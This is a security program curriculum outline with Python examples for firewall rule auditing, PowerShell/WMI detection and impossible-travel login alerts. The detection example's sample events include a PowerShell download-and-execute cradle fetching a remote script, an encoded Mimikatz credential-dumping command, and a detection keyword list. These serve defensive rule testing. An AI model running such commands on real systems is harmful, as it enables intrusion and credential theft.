This curriculum covers the design and day-to-day operation of an enterprise security program at the depth of a multi-workshop advisory engagement: threat modeling, identity governance, network segmentation, detection engineering, and incident response coordination as practiced in mature corporate security organizations.
Module 1: Threat Landscape Analysis and Risk Assessment
- Conducting asset-criticality assessments to prioritize protection of systems supporting core business functions.
- Selecting threat intelligence feeds based on industry relevance, data format compatibility, and integration effort with existing SIEM tools.
- Defining risk appetite thresholds in collaboration with legal and executive stakeholders to guide security investment decisions.
- Mapping attack vectors to MITRE ATT&CK framework for consistent threat modeling across business units.
- Performing red team exercises with controlled scope to avoid disruption to production environments.
- Updating risk registers quarterly to reflect changes in infrastructure, threat actors, and business strategy.
Module 2: Identity and Access Management Governance
- Implementing role-based access control (RBAC) with periodic access recertification campaigns for compliance with SOX or HIPAA.
- Negotiating MFA enforcement policies that balance security requirements with usability for remote and field employees.
- Integrating on-premises Active Directory with cloud identity providers using hybrid federation models.
- Establishing privileged access workflows that enforce just-in-time (JIT) access with session monitoring.
- Managing the service account lifecycle to prevent long-lived static credentials in automated processes, with rotation or short-lived tokens where the platform supports them.
- Enforcing access deprovisioning timelines following HR offboarding procedures.
Module 3: Network Security Architecture and Segmentation
- Designing micro-segmentation policies in virtualized environments to limit lateral movement during breaches.
- Deploying inline next-generation firewalls at data center egress points with performance impact testing.
- Configuring DNS filtering rules to block access to known malicious domains without disrupting business operations.
- Implementing VLAN isolation for guest, corporate, and OT networks with strict inter-VLAN routing rules.
- Managing firewall rulebase hygiene through regular audits to eliminate shadowed or unused rules.
- Evaluating SD-WAN security integration options when replacing legacy MPLS infrastructure.
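The rulebase hygiene audit in this module rests on a simple check: a rule is shadowed when an earlier rule already matches everything it would match, so it can never take effect. The Python below is an added example, not material from the curriculum or from any vendor's firewall tooling; the rulebase, its hit counters and the simplified five-tuple rule model are constructed for illustration (real exports also carry zones, source ports, schedules and NAT, which this omits).

```python
"""Pairwise shadowed/redundant rule detection for a firewall rulebase.

Added example: the rulebase below is constructed for illustration and is not
from any real firewall export. Rules are evaluated top-down, first match wins.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    action: str          # "allow" or "deny"
    proto: str           # "tcp", "udp" or "any"
    src: str             # CIDR
    dst: str             # CIDR
    dports: tuple        # inclusive (low, high) destination port range
    hits: int = 0        # hit counter as exported from the firewall (assumed field)


def covers(a: Rule, b: Rule) -> bool:
    """True if every packet that matches rule b would also match rule a."""
    proto_ok = a.proto == "any" or a.proto == b.proto
    src_ok = ipaddress.ip_network(b.src).subnet_of(ipaddress.ip_network(a.src))
    dst_ok = ipaddress.ip_network(b.dst).subnet_of(ipaddress.ip_network(a.dst))
    port_ok = a.dports[0] <= b.dports[0] and b.dports[1] <= a.dports[1]
    return proto_ok and src_ok and dst_ok and port_ok


def find_shadowed(rules):
    """Return (rule, kind, covering_rule) for each rule fully covered by an
    earlier one. kind is "shadowed" when the actions differ (the later rule can
    never take effect, which silently defeats an intended deny) and "redundant"
    when they are the same."""
    findings = []
    for i, later in enumerate(rules):
        for earlier in rules[:i]:
            if covers(earlier, later):
                kind = "redundant" if earlier.action == later.action else "shadowed"
                findings.append((later.name, kind, earlier.name))
                break  # the first covering rule is the one that would actually match
    return findings


def find_unused(rules):
    """Names of rules whose exported hit counter is zero."""
    return [r.name for r in rules if r.hits == 0]


# Constructed sample rulebase (top-down order).
SAMPLE_RULES = [
    Rule("R1", "allow", "tcp", "10.0.0.0/8", "10.20.0.0/16", (443, 443), hits=120_000),
    Rule("R2", "deny", "tcp", "10.1.0.0/16", "10.20.5.0/24", (443, 443), hits=0),
    Rule("R3", "allow", "tcp", "10.1.2.0/24", "10.20.0.0/16", (443, 443), hits=0),
    Rule("R4", "allow", "udp", "10.0.0.0/8", "10.30.0.0/16", (53, 53), hits=4_500),
    Rule("R5", "allow", "any", "10.0.0.0/8", "10.20.0.0/16", (443, 443), hits=310),
    Rule("R6", "deny", "any", "0.0.0.0/0", "0.0.0.0/0", (1, 65535), hits=9_900),
]

if __name__ == "__main__":
    for name, kind, by in find_shadowed(SAMPLE_RULES):
        print(f"{name} is {kind} (covered by {by})")
    print("zero-hit rules:", find_unused(SAMPLE_RULES))
```

The shadowed deny in R2 is the dangerous case: the rulebase reads as if 10.1.0.0/16 is blocked from 10.20.5.0/24, but R1 allows that traffic first. A pairwise check only finds rules covered by a single earlier rule; a rule covered only by the union of several earlier rules needs a set-based analysis and is not detected here.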
Module 4: Endpoint Detection and Response (EDR) Operations
- Selecting EDR agents based on OS coverage, telemetry depth, and endpoint performance overhead.
- Creating custom detection rules to identify suspicious PowerShell or WMI activity in Windows environments.
- Responding to high-fidelity alerts with memory and disk acquisition (volatile memory first, before any containment step that would power off or reboot the host) while preserving chain of custody.
- Coordinating endpoint containment actions with IT operations to minimize business disruption.
- Managing EDR console access with role-based permissions to prevent unauthorized policy changes.
- Integrating EDR telemetry with SOAR platforms for automated enrichment and response workflows.
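The custom detection rules this module calls for usually combine two kinds of logic: stateless pattern matching on a single event (a download cradle in a PowerShell script block, an encoded command that must be decoded before it can be inspected) and stateful correlation across events (a WMI event filter plus a consumer on the same host, which is a persistence mechanism). The Python below is an added example written for this page, not code from the curriculum or from any EDR product. It assumes events already parsed into dicts; the event IDs are the real ones (PowerShell script-block logging 4104, Sysmon process creation 1, Sysmon WMI filter/consumer/binding 19/20/21), but the event shapes, indicator list, rule names and sample telemetry are constructed.

```python
"""Toy detection rules for suspicious PowerShell and WMI activity.

Added example. The events below are constructed to resemble parsed Windows
telemetry (PowerShell script-block logging event 4104, Sysmon process-create
event 1, Sysmon WMI events 19 filter / 20 consumer / 21 binding) and are not
real telemetry from any environment.
"""
import base64
import binascii
import re

SUSPICIOUS_PS = re.compile(
    r"(Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|FromBase64String"
    r"|Net\.WebClient|Invoke-Mimikatz|-nop\b|-w(?:indowstyle)?\s+hidden)",
    re.IGNORECASE,
)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def evaluate(event):
    """Stateless rules: return a list of (rule_name, detail) for one event."""
    hits = []
    if event["id"] == 4104:
        m = SUSPICIOUS_PS.search(event["script"])
        if m:
            hits.append(("ps_scriptblock_suspicious", m.group(0)))
    elif event["id"] == 1:
        decoded = decode_encoded_command(event["cmdline"])
        if decoded is not None:
            # Scan the decoded payload, not the base64 blob it was hidden in.
            m = SUSPICIOUS_PS.search(decoded)
            hits.append(("ps_encoded_command", m.group(0) if m else decoded[:40]))
        elif SUSPICIOUS_PS.search(event["cmdline"]):
            hits.append(("ps_suspicious_cmdline", SUSPICIOUS_PS.search(event["cmdline"]).group(0)))
    return hits


def run_rules(events):
    """Apply the stateless rules plus a stateful WMI-subscription correlation."""
    alerts = []
    wmi_seen = {}  # host -> set of WMI event ids observed so far
    for ev in events:
        for rule, detail in evaluate(ev):
            alerts.append({"rule": rule, "host": ev["host"], "user": ev["user"], "detail": detail})
        if ev["id"] in (19, 20, 21):
            seen = wmi_seen.setdefault(ev["host"], set())
            seen.add(ev["id"])
            # A filter plus a consumer (or an explicit binding) is a persistence mechanism.
            if ev["id"] == 21 or {19, 20} <= seen:
                alerts.append({"rule": "wmi_event_subscription", "host": ev["host"],
                               "user": ev["user"], "detail": ev["wmi"]})
                wmi_seen[ev["host"]] = set()
    return alerts


# Constructed sample telemetry.
ENC = base64.b64encode("Invoke-Mimikatz -DumpCreds".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"id": 4104, "host": "ws01", "user": "alice",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": 4104, "host": "ws02", "user": "bob",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"id": 1, "host": "ws03", "user": "carol",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENC},
    {"id": 19, "host": "srv01", "user": "SYSTEM",
     "wmi": "EventFilter Name=Updater Query=SELECT * FROM __InstanceModificationEvent WITHIN 60"},
    {"id": 20, "host": "srv01", "user": "SYSTEM",
     "wmi": "EventConsumer Name=Updater Type=CommandLineEventConsumer"},
]

if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS):
        print(a)
```

Keyword lists like SUSPICIOUS_PS are a starting point, not a finished rule: production rules should be tuned against the environment's own baseline of administrative PowerShell so that the high-fidelity alerts this module assumes stay high-fidelity.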
Module 5: Security Information and Event Management (SIEM) Implementation
- Normalizing log formats from heterogeneous sources to enable correlation across network, endpoint, and cloud systems.
- Designing retention policies that comply with regulatory requirements while managing storage costs.
- Developing correlation rules to detect anomalous login patterns across geographies and time zones.
- Onboarding cloud service logs (e.g., AWS CloudTrail, Microsoft Entra ID sign-in logs, formerly Azure AD) using least-privilege read-only IAM roles, and sizing collectors for the provider's API rate limits.
- Validating log source uptime and parsing accuracy through continuous monitoring dashboards.
- Responding to SIEM performance degradation by optimizing queries and adjusting data ingestion filters.
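The anomalous-login correlation in this module is usually implemented as an impossible-travel rule: consecutive logins by one user are compared by great-circle distance and elapsed time, and an implied speed no aircraft could reach raises an alert. The Python below is an added example, not code from the curriculum or from any SIEM product. The login records, the 900 km/h plausibility threshold and the 100 km minimum distance are constructed assumptions; timestamps deliberately arrive with mixed offsets and out of order, since the rule only works once every source's timestamp is normalized to UTC and events are sorted per user.

```python
"""Impossible-travel correlation over authentication events.

Added example. The login records below are constructed; timestamps carry
mixed offsets on purpose, since a SIEM rule of this kind only works once every
source's timestamp has been normalized to UTC.
"""
import math
from collections import defaultdict
from datetime import datetime, timezone

MAX_PLAUSIBLE_KMH = 900.0   # assumed threshold, roughly airliner cruise speed
MIN_DISTANCE_KM = 100.0     # assumed: ignore geo-IP jitter inside one metro area


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two WGS84 points."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def to_utc(ts):
    """Parse an ISO-8601 timestamp with 'Z' or a numeric offset into aware UTC."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)


def impossible_travel(logins, max_kmh=MAX_PLAUSIBLE_KMH, min_km=MIN_DISTANCE_KM):
    """Flag consecutive logins per user whose implied speed exceeds max_kmh."""
    by_user = defaultdict(list)
    for user, ts, lat, lon in logins:
        by_user[user].append((to_utc(ts), lat, lon))
    alerts = []
    for user, events in by_user.items():
        events.sort()  # events may reach the SIEM out of order
        for (t0, la0, lo0), (t1, la1, lo1) in zip(events, events[1:]):
            dist = haversine_km(la0, lo0, la1, lo1)
            if dist < min_km:
                continue  # same city, or a duplicate record: never an alert
            hours = (t1 - t0).total_seconds() / 3600.0
            speed = dist / hours if hours > 0 else math.inf  # simultaneous logins far apart
            if speed > max_kmh:
                alerts.append({"user": user, "distance_km": round(dist), "hours": round(hours, 2),
                               "speed_kmh": round(speed) if math.isfinite(speed) else None})
    return alerts


# Constructed sample records: (user, timestamp, latitude, longitude).
SAMPLE_LOGINS = [
    ("alice", "2024-05-01T08:00:00Z", 40.7128, -74.0060),        # New York
    ("alice", "2024-05-01T09:30:00Z", 51.5074, -0.1278),         # London, 90 minutes later
    ("bob", "2024-05-01T08:00:00Z", 37.7749, -122.4194),         # San Francisco
    ("bob", "2024-05-01T16:00:00-04:00", 40.7128, -74.0060),     # New York, 12 h later, local offset
    ("carol", "2024-05-01T10:20:00+02:00", 48.8566, 2.3522),     # Paris, arrives first in the feed
    ("carol", "2024-05-01T08:00:00Z", 52.5200, 13.4050),         # Berlin, 20 minutes earlier
    ("carol", "2024-05-01T08:00:00Z", 52.5200, 13.4050),         # duplicate Berlin record
]

if __name__ == "__main__":
    for a in impossible_travel(SAMPLE_LOGINS):
        print(a)
```

Bob's coast-to-coast login in 12 hours is plausible and stays quiet; Alice (New York to London in 90 minutes) and Carol (Berlin to Paris in 20 minutes) alert. In production, VPN egress points and cloud provider IP ranges need an allowlist or the rule drowns in false positives from corporate VPN users.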
Module 6: Incident Response and Crisis Management
- Activating incident response playbooks based on incident classification (e.g., ransomware, data exfiltration).
- Coordinating communication between legal, PR, and technical teams during active breaches.
- Preserving forensic evidence from compromised systems while maintaining business continuity.
- Engaging third-party forensic firms under pre-negotiated contracts during major incidents.
- Conducting tabletop exercises with executive leadership to test crisis decision-making.
- Documenting post-incident timelines and root causes for regulatory reporting and internal review.
Module 7: Third-Party Risk and Supply Chain Security
- Assessing vendor security posture through standardized questionnaires (e.g., SIG, CAIQ) and on-site audits.
- Negotiating contractual clauses for breach notification timelines and liability allocation.
- Monitoring third-party access to corporate systems with dedicated logging and alerting.
- Requiring software bill of materials (SBOM) from critical vendors to assess open-source component risks.
- Enforcing multi-factor authentication for all external partner access to shared environments.
- Responding to supply chain compromises by isolating affected systems and validating software integrity.
Module 8: Security Policy Development and Compliance Alignment
- Drafting acceptable use policies that define permitted and prohibited activities on corporate devices.
- Aligning internal security controls with frameworks such as NIST CSF, ISO 27001, or CIS Controls.
- Conducting gap assessments to identify control deficiencies prior to regulatory audits.
- Updating policies to reflect changes in cloud adoption, remote work, or data residency laws.
- Enforcing policy adherence through technical controls rather than relying solely on user training.
- Documenting control exceptions with risk acceptance forms signed by business owners.